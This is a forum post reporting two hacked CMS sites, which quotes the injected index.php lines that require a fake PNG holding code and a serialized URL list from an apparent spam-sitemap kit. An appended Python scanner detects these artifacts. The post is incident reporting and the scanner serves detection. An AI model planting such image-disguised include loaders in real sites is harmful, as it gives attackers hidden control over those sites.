Have had 2 new 2.6.5 sites hacked.
New folder in root /sitemaps with a tonne of fake xml sitemaps, plus code injected into index.php:
//installbg
$rifilename='/var/www/vhosts/<DOMAIN>/httpdocs/content/img/footer-bgs.png';
require("$rifilename");
//installend
This "image" had a load of code in it (can post if wanted), and came along with 2 other similarly named images, one of which appeared to be a template, and the other contained:
a:20:{s:1:"/";s:6:"301480";s:12:"/favicon.ico";s:4:"5837";s:6:"/faqs/";s:6:"130846";s:17:"/solutions/floors";s:6:"251218";s:16:"/tel:08006891054";s:5:"13134";s:6:"/about";s:6:"378664";s:8:"/contact";s:6:"536125";s:34:"/mailto:<MY DOMAINS EMAI ADDRESS>";s:6:"162439";s:18:"/dzptyjaluptn.html";s:6:"268369";s:10:"/quotation";s:6:"207385";s:16:"/types-of-noise/";s:6:"394376";s:19:"/solutions/ceilings";s:6:"274574";s:16:"/solutions/walls";s:6:"117594";s:16:"/mibiovgznb.html";s:6:"347468";s:18:"/solutions/studios";s:6:"260624";s:10:"/solutions";s:6:"222152";s:18:"/solutions/bespoke";s:6:"287381";s:11:"/solutions/";s:6:"350582";s:14:"/ipdhthvu.html";s:6:"623653";s:23:"/?cachebuster=841958990";s:6:"131312";}
Cleaned and upgraded to 2.7.0, but is this a new exploit with 2.6.5?
Thanks
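
An added example, not part of the original post or the CMS's own code: a Python sweep of a docroot for the two artifacts reported above, PHP files that include/require a path ending in an image extension (directly or through a variable, as in the index.php snippet) and "image" files that lack image magic bytes or hold PHP or serialized data. The function names, extension list and heuristics are assumptions made for illustration.

```python
import re
from pathlib import Path

IMG = r"\.(?:png|jpe?g|gif|ico|webp)"
# Leading bytes of real PNG, JPEG, GIF, ICO and RIFF (WebP) files
MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a",
         b"\x00\x00\x01\x00", b"RIFF")
# $var = '...png';  an image path stored in a variable
ASSIGN = re.compile(r"\$(\w+)\s*=\s*['\"][^'\"]*" + IMG + r"['\"]", re.I)
# include/require given an image path as a string literal
DIRECT = re.compile(r"\b(?:include|require)(?:_once)?\b\s*\(?\s*['\"][^'\"]*"
                    + IMG + r"['\"]", re.I)
SERIALIZED = re.compile(rb"\s*a:\d+:\{")  # PHP serialize() array header


def scan_php(text):
    """Reasons a PHP source appears to load code from an 'image' file."""
    reasons = ["include/require of image path"] if DIRECT.search(text) else []
    for var in sorted(set(ASSIGN.findall(text))):
        use = r"\b(?:include|require)(?:_once)?\b[^;]*\$" + re.escape(var) + r"\b"
        if re.search(use, text, re.I):
            reasons.append(f"include/require of ${var} holding image path")
    if "//installbg" in text:  # marker comment quoted in the post
        reasons.append("//installbg marker")
    return reasons


def scan_image(data):
    """Reasons a file with an image extension is not really an image."""
    reasons = [] if data.startswith(MAGIC) else ["no image magic bytes"]
    if b"<?php" in data.lower():
        reasons.append("contains PHP open tag")
    if SERIALIZED.match(data):
        reasons.append("PHP serialized array")
    return reasons


def scan_tree(root):
    """Map relative path -> reasons for each suspicious file under root."""
    hits = {}
    for path in Path(root).rglob("*"):
        ext, found = path.suffix.lower(), []
        if path.is_file() and ext in (".php", ".phtml"):
            found = scan_php(path.read_text(errors="replace"))
        elif path.is_file() and re.fullmatch(IMG, ext):
            found = scan_image(path.read_bytes())
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits
```

Run `scan_tree()` against the site's document root and review every hit by hand; a clean result does not prove the site is clean, since the checks only cover the pattern described in this post.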